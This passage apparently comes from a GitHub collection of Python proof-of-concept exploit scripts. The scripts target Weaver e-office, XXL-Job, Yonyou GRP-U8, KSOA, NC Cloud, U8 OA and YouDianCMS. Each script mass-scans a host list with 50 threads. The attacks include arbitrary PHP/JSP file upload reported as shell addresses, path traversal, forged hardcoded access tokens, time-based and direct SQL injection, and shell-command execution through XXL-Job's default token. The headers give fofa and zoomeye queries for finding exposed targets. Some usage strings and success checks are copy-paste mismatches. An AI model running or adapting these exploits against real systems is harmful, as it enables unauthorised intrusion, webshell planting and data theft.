52 |             print (host+":false")
53 |     except:
54 |         return 0
55 |         print (host+"false")
56 | 
57 | 
58 | if __name__ == '__main__':
59 |     file = sys.argv[1]
60 |     data = open(file)
61 |     reader = csv.reader(data)
62 |     with ThreadPoolExecutor(50) as pool:
63 |         for row in reader:
64 |             pool.submit(exp, row[0])
65 | 


--------------------------------------------------------------------------------
/Weaver_Oa_Eoffice_Officeserver_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="泛微-EOffice"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Weaver_Oa_Eoffice_Officeserver_Upload_File_Poc.py url.txt                                   +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | def exp(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
40 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
41 |         "Host": "%s" %host2
42 |     }
43 |     headers2 = {
44 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
45 |         "Accept": "*/*",
46 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
47 |         "Accept-Encoding": "gzip, deflate",
48 |         "Host": "%s" %host2
49 |     }
50 |     data ="""------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
51 | Content-Disposition: form-data; name="FileData"; filename="1.jpg"
52 | Content-Type: image/jpeg
53 | 
54 | <?php phpinfo();unlink(__FILE__);?>
55 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
56 | Content-Disposition: form-data; name="FormData"
57 | 
58 | {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'success.php'}
59 | ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--"""
60 |     vulurl = url + "/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
61 |     vulurl2=url+"/eoffice10/server/public/iWebOffice2015/Document/success.php"
62 |     try:
63 |         r = requests.post(vulurl, headers=headers,data=data)
64 |         if r.status_code==200 :
65 |             print(url)
66 |             r2=requests.get(vulurl2,headers=headers2)
67 |             if r2.status_code==200 :
68 |                 print("shell地址为:"+url+"/eoffice10/server/public/iWebOffice2015/Document/success.php")
69 |             
70 |         else:
71 |             return 0
72 |             print (host+":false")
73 |     except:
74 |         return 0
75 |         print (host+":false")
76 | 
77 | 
78 | if __name__ == '__main__':
79 |     file = sys.argv[1]
80 |     data = open(file)
81 |     reader = csv.reader(data)
82 |     with ThreadPoolExecutor(50) as pool:
83 |         for row in reader:
84 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Weaver_Oa_Eoffice_Uploadify_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="泛微-EOffice"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Fanwei_Oa_Eoffice_Uploadify_Upload_File_Poc.py url.txt                                               +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | def exp(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
40 |         "Content-Type": "multipart/form-data;multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85",
41 |         "Host": "%s" %host2
42 |     }
43 |     headers2 = {
44 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
45 |         "Accept": "*/*",
46 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
47 |         "Accept-Encoding": "gzip, deflate",
48 |         "Host": "%s" %host2
49 |     }
50 |     data ='--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85\r\nContent-Disposition: form-data; name="Filedata"; filename="test.txt"\r\nContent-Type: application/octet-stream\r\n\r\n<?php phpinfo();?>\r\n\r\n--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--\r\n--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85\r\nContent-Disposition: form-data; name="file"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--'
51 |     vulurl = url + "/inc/jquery/uploadify/uploadify.php"
52 |     try:
53 |         
54 |         r = requests.post(vulurl, headers=headers,data=data)
55 |         if r.status_code==200 and len(r.text)>5 and len(r.text) < 20:
56 |             print("shell地址为： "+url+'/attachment/'+r.text+"/test.txt")
57 |             #r2=requests.get(vulurl2,headers=headers2)
58 |             #if r2.status_code==200 and "MDSEC" in r2.text:
59 |                # print(url+" :true")
60 |             #print("http://"+host+":true 文件地址为："+"")
61 |         else:
62 |             return 0
63 |             print (host+":false")
64 |     except:
65 |         return 0
66 |         print (host+":false")
67 | 
68 | 
69 | if __name__ == '__main__':
70 |     file = sys.argv[1]
71 |     data = open(file)
72 |     reader = csv.reader(data)
73 |     with ThreadPoolExecutor(50) as pool:
74 |         for row in reader:
75 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/XXL_Job_Default_Token_Rce.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa:"invalid request, HttpMethod not support" && port="9999" && region="HK"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 XXL_Job_Default_Token_Rce.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "Host": "%s" %host2,
40 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
41 |         "Content-Type": "application/json",
42 |         "XXL-JOB-ACCESS-TOKEN":"default token",
43 |         "Upgrade-Insecure-Requests":"1"
44 |     }
45 |     data ="""{
46 | "jobId": 1,
47 | "executorHandler": "demoJobHandler",
48 | "executorParams": "demoJobHandler",
49 | "executorBlockStrategy": "SERIAL_EXECUTION",
50 | "executorTimeout": 0,
51 | "logId": 1,
52 | "logDateTime": 1586373637819,
53 | "glueType": "GLUE_SHELL",
54 | "glueSource": "ping xxx.dnslog.cn",
55 | "glueUpdatetime": 1586693836766,
56 | "broadcastIndex": 0,
57 | "broadcastTotal": 0
58 | }"""
59 |     vulurl = url +"/run"
60 |     try:
61 |         r = requests.post(vulurl, headers=headers,data=data,proxies=proxysdata)
62 |         if r.status_code==200 and "The access token is wrong" not in r.text :
63 |             print("http://"+host+"  能打！！")
64 |         else:
65 |             print("http://"+host+"  不能打！！")
66 |             return 0
67 |             print (host+":false")
68 |     except:
69 |         print (host+":false")
70 | 
71 | 
72 | if __name__ == '__main__':
73 |     file = sys.argv[1]
74 |     data = open(file)
75 |     reader = csv.reader(data)
76 |     with ThreadPoolExecutor(50) as pool:
77 |         for row in reader:
78 |             pool.submit(poc, row[0])
79 | 


--------------------------------------------------------------------------------
/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：app="yonyou-GRP-U8"
 6 | # hunter：app.name="用友GRP-U8 OA"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | import time
15 | 
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+---------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                       +')
21 |     print(
22 |         '+---------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                     +')
25 |     print(
26 |         '+ EXP: python3 Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py url.txt                                      +')
27 |     print(
28 |         '+---------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8080'
32 | } 
33 | def poc(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "application/x-www-form-urlencoded",
43 |         "Host":"%s" % host2,
44 |         "Connection": "close",
45 |     }
46 |     data="userName=';WAITFOR DELAY '0:0:5'--&ysnd=&historyFlag="
47 |     vulurl = url + "/u8qx/bx_historyDataCheck.jsp"
48 |     try:
49 |         start_time = time.time()
50 |         r = requests.post(vulurl, headers=headers,data=data)
51 |         end_time = time.time()
52 |         response_time = end_time - start_time
53 |         if r.status_code==200 and response_time >5 and response_time<6 :
54 |             print(host+" :true 延时注入时间:"+str(response_time)[:6]+"s")
55 |         else:
56 |             return 0
57 |             print (host+":false")
58 |     except:
59 |         return 0
60 |         print (host+":false")
61 | 
62 | 
63 | if __name__ == '__main__':
64 |     file = sys.argv[1]
65 |     data = open(file)
66 |     reader = csv.reader(data)
67 |     with ThreadPoolExecutor(50) as pool:
68 |         for row in reader:
69 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Yongyou_KSOA_QueryService_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="用友-时空KSOA"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Yongyou_KSOA_QueryService_Sql_Poc.py url.txt                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
40 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
41 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
42 |         "Accept-Encoding": "gzip, deflate",
43 |         "Host":"%s" % host2
44 |     }
45 |     vulurl = url + "/servlet/com.sksoft.bill.QueryService?service=query&content=SELECT%20@@VERSION;"
46 |     try:
47 |         r = requests.get(vulurl, headers=headers)
48 |         #print(r.text)
49 |         if r.status_code==200 and "SQL Server" in r.text :
50 |             print(host+" :true   Version: "+r.text[103:160])
51 |         else:
52 |             return 0
53 |             print (host+":false")
54 |     except:
55 |         return 0
56 |         print (host+":false")
57 | 
58 | 
59 | if __name__ == '__main__':
60 |     file = sys.argv[1]
61 |     data = open(file)
62 |     reader = csv.reader(data)
63 |     with ThreadPoolExecutor(50) as pool:
64 |         for row in reader:
65 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Yongyou_NC_Cloud_Uploadchunk_Uploadfile_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：icon_hash="1596996317" && product="用友-NC-Cloud"
 6 | # Zoomeye: app:"Yonyou NC Cloud"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | 
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+---------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                       +')
20 |     print(
21 |         '+---------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                     +')
24 |     print(
25 |         '+ EXP: python3 Yongyou_NC_Cloud_Uploadchunk_Uploadfile_Poc.py url.txt                                     +')
26 |     print(
27 |         '+---------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8080'
31 | } 
32 | def poc(host):
33 |     if "http" in host:
34 |         url = host
35 |     else:
36 |         url ="http://"+host
37 |     host1=url.replace("http://","")
38 |     host2=host1.replace("https://","")
39 |     headers = {
40 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
41 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
42 |         "Accept-Encoding": "gzip, deflate",
43 |         "Accept": "image/avif,image/webp,*/*",
44 |         "Content-Type": "multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9",
45 |         "accessTokenNcc": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ"
46 |         ,"Host":"%s" % host2
47 |     }
48 |     data ='--024ff46f71634a1c9bf8ec5820c26fa9\r\nContent-Disposition: form-data; name="file"; filename="test.jsp"\r\n\r\n<%out.println("test");%>\r\n--024ff46f71634a1c9bf8ec5820c26fa9--'
49 |     vulurl = url + "/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1"
50 |     try:
51 |         r = requests.post(vulurl, data=data,headers=headers,proxies=proxysdata)
52 |         if r.status_code==200 and "i18nCode" in r.text :
53 |             response1=requests.get(url+"/nccloud/test.jsp")
54 |             if "test" in response1.text:
55 |                 print(url+"true!  "+url+"/nccloud/test.jsp")
56 |         else:
57 |             return 0
58 |             print (host+":false")
59 |     except:
60 |         return 0
61 |         print (host+":false")
62 | 
63 | 
64 | if __name__ == '__main__':
65 |     file = sys.argv[1]
66 |     data = open(file)
67 |     reader = csv.reader(data)
68 |     with ThreadPoolExecutor(50) as pool:
69 |         for row in reader:
70 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Yongyou_NC_Cloud_importhttpscer_FileUpload_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # Zoomeye: app:"Yonyou NC Cloud"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Ruijie_NBR_FileUpload_Poc.py url.txt                                                        +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Host": "%s" %host2,
43 |         "Content-Type": "multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0",
44 |         "Accept-Encoding": "gzip, deflate",
45 |         "accessToken":"eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA"
46 |     }
47 |     vulurl = url + "/nccloud/mob/pfxx/manualload/importhttpscer"
48 |     data="""--fd28cb44e829ed1c197ec3bc71748df0\r\nContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/141172.jsp"\r\n\r\n<%out.println(1111*1111);%>\r\n--fd28cb44e829ed1c197ec3bc71748df0--"""
49 |     try:
50 |         r = requests.post(vulurl, data=data,headers=headers,verify=False,proxies=proxysdata)
51 |         r2 = requests.get(url+"/141172.jsp")
52 |         if "1234321" in r2.text :
53 |             print("shell地址为："+url+"/141172.jsp")     
54 |         else:
55 |             return 0
56 |             print (host+":false")
57 |     except:
58 |         return 0
59 |         print (host+":false")
60 | 
61 | 
62 | if __name__ == '__main__':
63 |     file = sys.argv[1]
64 |     data = open(file)
65 |     reader = csv.reader(data)
66 |     with ThreadPoolExecutor(50) as pool:
67 |         for row in reader:
68 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Yongyou_U8_OA_doUpload_Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa: title="用友U8-OA"
 6 | # zoomeye: app:"yonyou U8"
 7 | import ssl
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | from concurrent.futures import ThreadPoolExecutor
14 | urllib3.disable_warnings()
15 | if len(sys.argv) != 2:
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
20 |     print(
21 |         '+----------------------------------------------------------------------------------------------------------+')
22 |     print(
23 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
24 |     print(
25 |         '+ EXP: python3 YouDianCMS_image_upload_Upload_File_Poc.py url.txt                                         +')
26 |     print(
27 |         '+----------------------------------------------------------------------------------------------------------+')
28 |     sys.exit()
29 | proxysdata = {
30 | 'http': '127.0.0.1:8082'
31 | }  
32 | def exp(host):
33 |     if "http" in host:
34 |         url = host
35 |     else:
36 |         url ="http://"+host
37 |     host1=url.replace("http://","")
38 |     host2=host1.replace("https://","")
39 |     headers = {
40 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
41 |         "Content-Type": "multipart/form-data; boundary=7b1db34fff56ef636e9a5cebcd6c9a75",
42 |         "Host": "%s" %host2,
43 |         "Accept": "image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8",
44 |         "Upgrade-Insecure-Requests": "1"
45 |     }
46 |     data ="""--7b1db34fff56ef636e9a5cebcd6c9a75\r\nContent-Disposition: form-data; name="iconFile"; filename="info.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n<% out.println("tteesstt1"); %>\r\n--7b1db34fff56ef636e9a5cebcd6c9a75--"""
47 |     vulurl = url + "/yyoa/portal/tools/doUpload.jsp"
48 |     try:
49 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
50 |         if  "null" not in r.text and "returnValue" in r.text:
51 |             print(url+"/yyoa/portal/upload/"+r.text[-51:-34])
52 |         else:
53 |             return 0
54 |             print (host+":false")
55 |     except:
56 |         return 0
57 |         print (host+":false")
58 | 
59 | 
60 | if __name__ == '__main__':
61 |     file = sys.argv[1]
62 |     data = open(file)
63 |     reader = csv.reader(data)
64 |     with ThreadPoolExecutor(50) as pool:
65 |         for row in reader:
66 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/YouDianCMS__Upload_File_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fofa：icon_hash="-1629133697"
 6 | # zoomeye:iconhash: "40d924d96b8903a41252bc0a8eb3f39b"
 7 | 
 8 | import ssl
 9 | import sys
10 | import requests
11 | import csv
12 | import urllib3
13 | import hashlib
14 | from concurrent.futures import ThreadPoolExecutor
15 | urllib3.disable_warnings()
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+----------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
25 |     print(
26 |         '+ EXP: python3 YouDianCMS_image_upload_Upload_File_Poc.py url.txt                                         +')
27 |     print(
28 |         '+----------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'http': '127.0.0.1:8080'
32 | }  
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data; boundary=cadc403efc1ad12f5fcce44c172baad2",
43 |         "Host": "%s" %host2
44 |     }
45 |     data ="""--cadc403efc1ad12f5fcce44c172baad2
46 | Content-Disposition: form-data; name="files"; filename="c.php"
47 | Content-Type: image/jpg
48 | 
49 | <?php phpinfo();?>
50 | --cadc403efc1ad12f5fcce44c172baad2--
51 | """
52 |     vulurl = url + "/Public/ckeditor/plugins/multiimage/dialogs/image_upload.php"
53 |     try:
54 |         r = requests.post(vulurl, headers=headers,data=data,verify=False)
55 |         if  "imgurl" in r.text:
56 |             json_dict=r.json()
57 |             print(url+"/Public/"+json_dict["imgurl"])
58 |         else:
59 |             return 0
60 |             print (host+":false")
61 |     except:
62 |         return 0
63 |         print (host+":false")
64 | 
65 | 
66 | if __name__ == '__main__':
67 |     file = sys.argv[1]
68 |     data = open(file)
69 |     reader = csv.reader(data)
70 |     with ThreadPoolExecutor(50) as pool:
71 |         for row in reader:
72 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/image/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MD-SEC/MDPOCS/4de61fc965525a3f6af6049ef28d0b1619a649c1/image/.DS_Store


--------------------------------------------------------------------------------
/image/README/1691885589911.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MD-SEC/MDPOCS/4de61fc965525a3f6af6049ef28d0b1619a649c1/image/README/1691885589911.png


--------------------------------------------------------------------------------
/image/README/公众号.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MD-SEC/MDPOCS/4de61fc965525a3f6af6049ef28d0b1619a649c1/image/README/公众号.png


--------------------------------------------------------------------------------
/image/README/猫蛋儿微信.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MD-SEC/MDPOCS/4de61fc965525a3f6af6049ef28d0b1619a649c1/image/README/猫蛋儿微信.jpeg


--------------------------------------------------------------------------------